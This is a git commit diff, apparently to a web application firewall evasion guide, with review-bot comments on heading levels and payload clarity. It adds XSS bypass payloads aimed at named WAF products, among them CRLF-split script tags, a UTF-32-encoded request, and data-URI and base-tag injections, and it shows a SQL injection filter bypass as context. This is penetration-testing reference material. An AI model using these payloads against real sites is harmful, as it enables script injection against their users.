Added more stuff

This commit is contained in:
0xInfection 2019-02-20 18:47:25 +05:30
parent ea9e7788dc
commit 6a7b4b0ad1

@ -1417,9 +1417,11 @@ Wanna detect WAFs? Lets see how.
</tr>
</table>
## Evasion Techniques
# Evasion Techniques
Lets look at some methods of bypassing and evading WAFs.
## Cross Site Scripting:
### Fuzzing/Bruteforcing:
#### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
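Review bot: Promoting `## Evasion Techniques` to `# Evasion Techniques` introduces a second top-level heading while the sibling `## Awesome Tools` section later in this file stays at H2, so the document outline (and any generated table of contents) becomes lopsided; keep this at `##` or promote the other major sections in the same commit. The new `## Cross Site Scripting:` heading then sits one level below it, which is fine. While touching the intro line, `Lets look at some methods` should read `Let's look at some methods`.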
@ -1447,7 +1449,7 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
#### Techniques:
##### Keyword Filter Detection/Bypass
### Keyword Filter Detection/Bypass
__SQL Injection__
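Review bot: `### Keyword Filter Detection/Bypass` now outranks the `#### Techniques:` heading directly above it, so it renders as a sibling of `### Fuzzing/Bruteforcing:` rather than as one of the techniques that label announces; either drop the `#### Techniques:` line or make this heading `####`. Note also that the block continues with `__SQL Injection__`, yet the first hunk of this commit files everything from here under the new `## Cross Site Scripting:` heading, so the SQL injection keyword-filter material is now categorised as XSS.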
@ -1512,7 +1514,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
__Scenario 2: Cross Site Scripting__
##### Step 1:
- Normal deliberate test:
```
<script>alert()</script>
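Review bot: Removing `##### Step 1:` leaves `- Normal deliberate test:` as the first bullet of Scenario 2 with no step marker; if the later steps of this scenario keep their `##### Step N:` headings, the sequence now starts at 2, so either remove those in the same way or keep this one. The fence that follows has no language tag; tagging these payload fences `html` would give them highlighting.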
@ -1523,6 +1524,8 @@ __Scenario 2: Cross Site Scripting__
```
- Bypassing firewall regex with new line (`\r\n`):
```
<script>\r\nalert(1)</script>
<script>
alert(1)</script>
```
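Review bot: The two added lines `<script>` and `alert(1)</script>` are the same payload as `<script>\r\nalert(1)</script>` with the CRLF rendered, but nothing in the block says so, and a reader will count three payloads instead of one; add a short caption such as `which the filter sees as:` between them or a comment inside the fence. One sentence on the defensive side would also help: a filter like the `preg_match` example earlier in this section misses this unless the pattern runs in dotall/multiline mode or the input has its whitespace normalised before matching, which is the actual lesson of the example.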
@ -1563,10 +1566,10 @@ script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert(1)"></script a=\u0
Example request:
<pre>
GET <b>/page.php?param=∀㸀㰀script㸀alert(1)㰀/script㸀</b> HTTP/1.1
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
<b>Accept-Charset:utf-32, iso-8859-1;q=0.5</b>
<b>Accept-Charset:utf-32; q=0.5</b>
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
</pre>
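Review bot: The new request line should state the byte order it assumes: `%00%00%00%3C` is `<` only when decoded as UTF-32BE, and the surrounding text gives no hint of that, so a reader cannot reproduce or test the decoding. The percent-encoded form is clearer than the raw characters it replaces, but the `<b>` markers now wrap a different payload than before (`<script>alert(1)</script>` in the removed line, `svg/onload=alert()` in the added one) without comment; mention in the prose that the payload changed. Minor: `Accept-Charset:utf-32; q=0.5` drops the `iso-8859-1` fallback the old header offered and still lacks the space after the colon that every other header in the block has.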
@ -1684,6 +1687,11 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
### __Imperva SecureSphere__
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
```
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
- XSS Bypass by [@WAFNinja](https://waf.ninja)
```
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
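Review bot: The new `XSS Bypass by [@WAFNinja]` entry gives only the percent-encoded form, unlike the `@Alra3ees` entry directly above it, which lists the plain payload and then its encoded variant; add the decoded form so a reader can see which tokens the filter is being tested against and so someone writing a detection rule does not have to decode two layers by hand. The attribution link points at `https://waf.ninja` rather than an author profile like the other entries; if that is the project's own site, say so.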
@ -1693,6 +1701,10 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
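Review bot: The added `@c0d3g33k` entry needs a one-line explanation: the run of five semicolons in `data:text/html;;;;;base64,` is presumably the point of the payload, but without a note it reads like a typo that a later contributor will "fix". Showing what the base64 body decodes to, as the other entries show payloads in plain text, would also let a defender see that the data URI wrapper, not the encoded body, is what a rule has to inspect.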
@ -1892,6 +1904,12 @@ Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
### __Kona SiteDefender__
- XSS Bypass by [@zseano](https://twitter.com/zseano)
```
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
## Awesome Tools
### WAF Fingerprinting:
__1. Fingerprinting with [NMap](https://nmap.org)__:
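Review bot: The new `### __Kona SiteDefender__` payload mixes raw and percent-encoded characters (`"`, `<`, `>` literal next to `%20` and `%3D`) without saying which form was actually sent, and `https:\mysite` is an unlabelled placeholder; mark it as one and present the payload either fully raw or fully encoded, as the other vendor entries do. A sentence on why a `<base>` tag matters here (it changes how every relative URL on the page resolves) would help readers who only associate XSS filtering with `<script>`, and it is the detail a detection rule would need to key on.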